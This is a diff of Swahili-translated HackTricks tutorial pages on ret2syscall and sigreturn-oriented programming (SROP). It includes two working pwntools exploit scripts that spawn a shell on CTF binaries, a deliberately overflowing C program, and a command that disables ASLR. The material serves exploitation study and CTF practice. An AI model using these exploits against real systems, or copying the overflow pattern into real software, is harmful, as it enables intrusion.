* Biti 64, nx, hakuna PIE, andika kwenye kumbukumbu fulani ROP ili kuita `execve` na ruka hapo. Ili kuandika kwenye steki kazi ya kufanya operesheni za hisabati inatumika vibaya
* Biti 64, nx, hakuna PIE, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo. Ili kuandika kwenye steki kazi ya kufanya operesheni za hisabati inatumika vibaya
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals16\_feedme/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals16\_feedme/index.html)
* Biti 64, hakuna PIE, nx, BF canary, andika kwenye kumbukumbu fulani ROP ili kuita `execve` na ruka hapo.
* Biti 64, hakuna PIE, nx, BF canary, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo.

20
binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,11 +10,11 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
Pata maelezo ya arm64 katika:
Pata utangulizi wa arm64 katika:
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
@ -58,7 +58,7 @@ Ili kuandaa wito kwa **syscall** inahitajika mazingira yafuatayo:
- `x1: 0 taja hakuna hoja zilizopitishwa`
- `x2: 0 taja hakuna mazingira ya mazingira yaliyopitishwa`
Kwa kutumia ROPgadget.py niliweza kutambua vifaa vifuatavyo:
Kutumia ROPgadget.py niliweza kutambua vifaa vifuatavyo katika maktaba ya libc ya mashine:
{% code overflow="wrap" %}
```armasm
@ -81,6 +81,10 @@ svc #0
Kwa vifaa vya awali tunaweza kudhibiti rejista zote zinazohitajika kutoka kwenye steki na kutumia x5 kuruka kwenye kifaa cha pili ili kuita syscall.
{% hint style="success" %}
Tafadhali kumbuka kwamba kujua habari hii kutoka kwa maktaba ya libc pia inaruhusu kufanya shambulio la ret2libc, lakini tutumie kwa mfano huu wa sasa.
{% endhint %}
### Kudukua
```python
from pwn import *
@ -132,14 +136,14 @@ p.interactive()
```
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

162
binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md Normal file
View file

@ -0,0 +1,162 @@
# SROP - Programu ya Sigreturn-Oriented
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
**`Sigreturn`** ni **syscall** maalum ambayo kimsingi hutumiwa kusafisha baada ya kikamata ishara kumaliza utekelezaji wake. Ishara ni mapumziko yanayotumwa kwa programu na mfumo wa uendeshaji, mara nyingi kumaanisha kuwa hali isiyo ya kawaida imejitokeza. Wakati programu inapokea ishara, kwa muda inasitisha kazi yake ya sasa kushughulikia ishara na **kikamata ishara**, kazi maalum iliyoundwa kushughulikia ishara.
Baada ya kikamata ishara kumaliza, programu inahitaji **kuendelea na hali yake ya awali** kana kwamba hakuna kilichotokea. Hapa ndipo **`sigreturn`** inapoingia. Inasaidia programu **kurudi kutoka kwa kikamata ishara** na kurejesha hali ya programu kwa kusafisha fremu ya steki (sehemu ya kumbukumbu inayohifadhi wito wa kazi na pembejeo za mitaa) ambayo ilitumiwa na kikamata ishara.
Sehemu inayovutia ni jinsi **`sigreturn`** inavyorejesha hali ya programu: inafanya hivyo kwa kuhifadhi **thamani zote za usajili wa CPU kwenye steki.** Ishara haizuiwi tena, **`sigreturn` inapitisha thamani hizi kutoka kwenye steki**, ikirejesha thamani za usajili wa CPU kwa hali yake kabla ya ishara kushughulikiwa. Hii ni pamoja na usajili wa kidhibiti wa steki (RSP), ambao unaelekeza kwenye sehemu ya juu ya sasa ya steki.
{% hint style="danger" %}
Kuita syscall **`sigreturn`** kutoka kwa mnyororo wa ROP na **kuongeza thamani za usajili** tungependa iweke kwenye **steki** inawezekana **kudhibiti** thamani zote za usajili na hivyo **kuita** kwa mfano syscall `execve` na `/bin/sh`.
{% endhint %}
Tafadhali angalia jinsi hii itakuwa **aina ya Ret2syscall** ambayo inafanya iwe rahisi kudhibiti vigezo vya kuita Ret2syscalls nyingine:
{% content-ref url="../rop-syscall-execv/" %}
[rop-syscall-execv](../rop-syscall-execv/)
{% endcontent-ref %}
Ikiwa una hamu hii ni **muundo wa sigcontext** uliohifadhiwa kwenye steki kwa kupona thamani baadaye (mtaalam kutoka [**hapa**](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)):
```
+--------------------+--------------------+
| rt_sigeturn() | uc_flags |
+--------------------+--------------------+
| &uc | uc_stack.ss_sp |
+--------------------+--------------------+
| uc_stack.ss_flags | uc.stack.ss_size |
+--------------------+--------------------+
| r8 | r9 |
+--------------------+--------------------+
| r10 | r11 |
+--------------------+--------------------+
| r12 | r13 |
+--------------------+--------------------+
| r14 | r15 |
+--------------------+--------------------+
| rdi | rsi |
+--------------------+--------------------+
| rbp | rbx |
+--------------------+--------------------+
| rdx | rax |
+--------------------+--------------------+
| rcx | rsp |
+--------------------+--------------------+
| rip | eflags |
+--------------------+--------------------+
| cs / gs / fs | err |
+--------------------+--------------------+
| trapno | oldmask (unused) |
+--------------------+--------------------+
| cr2 (segfault addr)| &fpstate |
+--------------------+--------------------+
| __reserved | sigmask |
+--------------------+--------------------+
```
Kwa maelezo bora angalia pia:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
## Mfano
Unaweza [**kupata mfano hapa**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) ambapo wito wa signeturn unajengwa kupitia ROP (kuweka katika rxa thamani `0xf`), ingawa hii ni shambulizi la mwisho kutoka hapo:
```python
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = SYSCALL_RET
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf) # 0xf is the number of the syscall sigreturn
payload += p64(SYSCALL_RET)
payload += bytes(frame)
p.sendline(payload)
p.interactive()
```
Angalia pia [**exploit kutoka hapa**](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html) ambapo binary ilikuwa tayari inaita `sigreturn` na kwa hivyo haifai kujenga hiyo na **ROP**:
```python
from pwn import *
# Establish the target
target = process("./small_boi")
#gdb.attach(target, gdbscript = 'b *0x40017c')
#target = remote("pwn.chal.csaw.io", 1002)
# Establish the target architecture
context.arch = "amd64"
# Establish the address of the sigreturn function
sigreturn = p64(0x40017c)
# Start making our sigreturn frame
frame = SigreturnFrame()
frame.rip = 0x400185 # Syscall instruction
frame.rax = 59 # execve syscall
frame.rdi = 0x4001ca # Address of "/bin/sh"
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
payload = "0"*0x28 # Offset to return address
payload += sigreturn # Function with sigreturn
payload += str(frame)[8:] # Our sigreturn frame, adjusted for the 8 byte return shift of the stack
target.sendline(payload) # Send the target payload
# Drop to an interactive shell
target.interactive()
```
## Mifano Mingine & Marejeo
* [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
* [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
* [https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)
* Programu ya ushirikiano wa kufunga ambayo inaruhusu **kuandika kwenye stack** na kisha kuita **syscall ya `sigreturn`**. Inawezekana kuandika kwenye stack [**ret2syscall**](../rop-syscall-execv/) kupitia muundo wa **sigreturn** na kusoma bendera ambayo iko ndani ya kumbukumbu ya programu ya ushirikiano.
* [https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html)
* Programu ya ushirikiano wa kufunga ambayo inaruhusu **kuandika kwenye stack** na kisha kuita **syscall ya `sigreturn`**. Inawezekana kuandika kwenye stack [**ret2syscall**](../rop-syscall-execv/) kupitia muundo wa **sigreturn** (programu ya ushirikiano ina string `/bin/sh`).
* [https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html)
* Biti 64, hakuna relro, hakuna canary, nx, hakuna pie. Uvujaji rahisi wa buffer unaoabuse kazi ya `gets` bila vifaa vya kutekeleza [**ret2syscall**](../rop-syscall-execv/). Mnyororo wa ROP unaandika `/bin/sh` katika `.bss` kwa kuita tena gets, inatumia kazi ya **`alarm`** kuweka eax kuwa `0xf` ili kuita **SROP** na kutekeleza kifaa cha shell.
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
* Programu ya ushirikiano ya biti 64, hakuna relro, hakuna canary, nx, hakuna pie. Mchakato unaruhusu kuandika kwenye stack, kudhibiti vijenzi kadhaa, na kuita syscall na kisha kuita `exit`. Kifaa cha syscall kilichochaguliwa ni `sigreturn` ambacho kitaweka vijenzi na kuhamisha `eip` kuita maagizo ya awali ya syscall na kukimbia `memprotect` kuweka nafasi ya programu kuwa `rwx` na kuweka ESP katika nafasi ya programu. Kufuata mchakato, programu itaita kusoma intro ESP tena, lakini katika kesi hii ESP itakuwa inaelekeza kwa maagizo yanayofuata hivyo kupitisha shellcode itaandika kama maagizo yanayofuata na kuyatekeleza.
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

57
binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md Normal file
View file

@ -0,0 +1,57 @@
# SROP - ARM64
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Code
```c
#include <stdio.h>
#include <string.h>
void do_stuff(int do_arg){
if (do_arg == 1)
__asm__("mov x0, #139; svc #0;");
return;
}
char* vulnerable_function() {
char buffer[64];
fgets(buffer, sizeof(buffer)*3, stdin);
return buffer;
}
int main(int argc, char **argv) {
char* b = vulnerable_function();
do_stuff(2);
return 0;
}
```
Sakinisha kwa:
```bash
clang -o srop srop.c -fno-stack-protector
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR
```
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>